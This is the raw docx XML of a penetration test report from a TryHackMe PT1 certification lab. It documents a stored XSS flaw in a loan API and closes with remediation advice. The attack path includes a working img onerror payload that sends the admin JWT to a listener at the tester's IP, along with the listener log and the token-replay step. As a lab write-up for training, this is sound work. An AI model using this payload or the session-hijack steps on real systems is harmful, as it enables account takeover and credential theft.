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pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe PT1 Certification Examination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #2 of 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>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10.200.150.100</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March 2026</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 Category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XSS / Session Hijacking</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Affected Endpoint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/api/v1.0/loan — Purpose of Loan field</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CVSS Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL — 9.3</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6600"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Captured via stolen admin JWT (see Step 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pP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Vulnerability Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The loan creation endpoint at POST /api/v1.0/loan fails to sanitize user input in the Purpose of Loan field before storing it in the database. When an administrator views the pending loan queue, the unsanitized content is rendered directly in their browser, executing any embedded JavaScript. This is a Stored XSS vulnerability — the payload persists in the database and re-executes every time the loan is viewed by any admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The application stores the user authentication JWT token in localStorage, which is readable by any JavaScript running on the page. The injected payload reads this token and silently transmits it to an attacker-controlled server. Using the stolen token, the attacker can fully impersonate the administrator without ever knowing their password.</w:t>
      </w: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Attack Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Authentication as a Standard User</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A standard user account was registered and used to authenticate against the API. Only standard user privileges are required — no elevated access needed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1.0/auth HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{"username": "user_one", "password": "password"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A valid JWT session token was returned and used for all subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Setting Up the Listener</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A simple HTTP server was started on the attacker machine to capture incoming exfiltration requests:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This server would receive a GET request from the victim's browser containing the stolen token as a URL parameter once the XSS payload executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Identifying the Injection Point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The JavaScript bundle at /assets/index-D0hpbJU7.js was fetched and analysed to map all frontend routes. The route /loans/create was identified. A loan was submitted through the UI and intercepted with Burp Suite:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1.0/loan HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 10.200.150.100:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer &lt;user_jwt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{"amount": 1000, "purpose": "home renovation", "term": 12}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose field was identified as user-controlled input that is stored server-side and later rendered in the admin dashboard without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Injecting the XSS Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose field was replaced with the following payload in Burp Suite Repeater and forwarded. The payload creates a hidden image request that carries the admin token as a URL parameter to the attacker's listener:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror="new Image().src='http://10.112.112.145:4444/?token='+localStorage.getItem('token');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The server accepted the loan submission and stored the payload without any sanitization or rejection, returning HTTP 200 OK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 — Trigger: Administrator Reviews the Loan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Once an administrator navigated to the pending loans section to review the submission, the browser attempted to render the img tag. Since the src attribute was invalid (x), the onerror event fired immediately and automatically, executing the injected JavaScript in the context of the administrator's authenticated browser session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 — Token Exfiltration and Account Takeover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The admin's JWT token appeared in the listener log on the attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">10.250.1.6 - - [04/Mar/2026 13:54:28] "GET /?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6MS4i... HTTP/1.1" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The token was decoded to confirm it belonged to the admin account. It was then injected into the attacker's browser localStorage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage.setItem('token', '&lt;stolen_token_here&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Refreshing the application granted full administrative access. The flag was retrieved from the admin dashboard as confirmation of the successful account takeover.</w:t>
      </w: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Remediation Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML-encode all user-supplied output before rendering. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any content from user input that is displayed in the browser must be HTML-entity encoded server-side before insertion into the DOM. Characters such as &lt; and &gt; must be converted to &amp;lt; and &amp;gt; to prevent the browser from interpreting them as HTML tags.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Store authentication tokens in HttpOnly cookies instead of localStorage. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens in localStorage are accessible to any JavaScript on the page. Moving the token to an HttpOnly cookie makes it completely inaccessible to scripts — this alone neutralises XSS-based token theft even if a payload executes successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a Content Security Policy (CSP) header. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A strict CSP prevents the browser from loading external resources or executing inline scripts, blocking the exfiltration request even if the payload were injected:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self' data:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitize input server-side using a dedicated library. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a well-maintained HTML sanitization library such as DOMPurify (JavaScript) or bleach (Python) to strip disallowed HTML tags and event handler attributes from all user input before it is stored in the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce input validation at the API layer. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose field should reject input containing HTML tags or JavaScript event handler patterns (onerror, onload, onclick, etc.) and enforce a maximum character length. This should be validated server-side and never rely solely on the frontend.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18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">PENETRATION TEST REPORT  |  TryHackMe PT1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2026-03-04T16:21:17.065Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-04T16:21:17.067Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>